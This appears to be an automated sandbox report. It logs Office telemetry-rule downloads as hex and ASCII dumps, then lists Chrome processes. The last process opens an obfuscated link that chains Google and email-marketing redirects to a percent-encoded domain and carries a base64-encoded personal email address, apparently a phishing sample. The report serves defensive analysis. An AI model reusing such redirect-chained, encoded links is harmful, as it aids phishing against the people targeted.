                            2024-11-14 22:39:15 UTC1369INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 4d 61 63 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookMac" S="Medium" /> <F T


                            Session IDSource IPSource PortDestination IPDestination Port
                            145192.168.2.45527213.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:15 UTC192OUTGET /rules/rule703001v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:15 UTC515INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:15 GMT
                            Content-Type: text/xml
                            Content-Length: 1406
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                            ETag: "0x8DC582BEB16F27E"
                            x-ms-request-id: 18d5585a-801e-0015-2dfc-35f97f000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223915Z-1749fc9bdbddsfp5hC1DFWz2ng00000000x000000000zrdf
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            X-Cache-Info: L1_T2
                            Accept-Ranges: bytes
                            2024-11-14 22:39:15 UTC1406INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                            Session IDSource IPSource PortDestination IPDestination Port
                            146192.168.2.45527413.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:15 UTC192OUTGET /rules/rule700751v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:15 UTC538INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:15 GMT
                            Content-Type: text/xml
                            Content-Length: 1414
                            Connection: close
                            Vary: Accept-Encoding
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                            ETag: "0x8DC582BE03B051D"
                            x-ms-request-id: 8ba6fbd3-701e-0032-29d2-2ca540000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223915Z-16547b76f7fknvdnhC1DFWxnys0000000m5g000000012gk4
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:15 UTC1414INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                            Session IDSource IPSource PortDestination IPDestination Port
                            147192.168.2.45527513.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:16 UTC192OUTGET /rules/rule700750v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:16 UTC538INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:16 GMT
                            Content-Type: text/xml
                            Content-Length: 1377
                            Connection: close
                            Vary: Accept-Encoding
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:28:02 GMT
                            ETag: "0x8DC582BEAFF0125"
                            x-ms-request-id: 87019636-c01e-0082-15c7-2caf72000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223916Z-16547b76f7f4k79zhC1DFWu9y00000000m7g00000000u803
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:16 UTC1377INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 44 65 73 6b 74 6f 70 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookDesktop" S="Medium" />


                            Session IDSource IPSource PortDestination IPDestination Port
                            148192.168.2.45527613.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:16 UTC192OUTGET /rules/rule700151v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:16 UTC494INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:16 GMT
                            Content-Type: text/xml
                            Content-Length: 1399
                            Connection: close
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                            ETag: "0x8DC582BE0A2434F"
                            x-ms-request-id: 005cfd91-701e-0097-2e09-36b8c1000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223916Z-1749fc9bdbdxm7w9hC1DFWy1k400000000xg00000000az7w
                            x-fd-int-roxy-purgeid: 0
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:16 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOn


                            Session IDSource IPSource PortDestination IPDestination Port
                            149192.168.2.45527713.107.246.45443
                            TimestampBytes transferredDirectionData
                            2024-11-14 22:39:16 UTC192OUTGET /rules/rule700150v1s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                            Host: otelrules.azureedge.net
                            2024-11-14 22:39:16 UTC538INHTTP/1.1 200 OK
                            Date: Thu, 14 Nov 2024 22:39:16 GMT
                            Content-Type: text/xml
                            Content-Length: 1362
                            Connection: close
                            Vary: Accept-Encoding
                            Vary: Accept-Encoding
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                            ETag: "0x8DC582BE54CA33F"
                            x-ms-request-id: 1d414214-201e-0003-4d32-2cf85a000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20241114T223916Z-16547b76f7fxdzxghC1DFWmf7n0000000m9g00000000v4v7
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L1_T2
                            X-Cache: TCP_HIT
                            Accept-Ranges: bytes
                            2024-11-14 22:39:16 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e 65 4e 6f 74 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOneNote" S="Medium" /> <F T="2">


                            Click to jump to process

                            Click to jump to process

                            Click to jump to process

                            Target ID:0
                            Start time:17:37:50
                            Start date:14/11/2024
                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                            Imagebase:0x7ff76e190000
                            File size:3'242'272 bytes
                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:false

                            Target ID:2
                            Start time:17:37:53
                            Start date:14/11/2024
                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1972,i,7630027438406518576,1411224697696924047,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                            Imagebase:0x7ff76e190000
                            File size:3'242'272 bytes
                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:false

                            Target ID:3
                            Start time:17:37:54
                            Start date:14/11/2024
                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.com/url?sa=https://r20.rs6.net/tnt.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/%73%61%66%65%74%79%77%6F%72%6B%73%6F%6C%75%74%69%6F%6E%73%2E%63%6F%6D%2F%73%78%7A%70%2F7220292368/am9lLm5ndXllbkBsZWcud2EuZ292"
                            Imagebase:0x7ff76e190000
                            File size:3'242'272 bytes
                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            No disassembly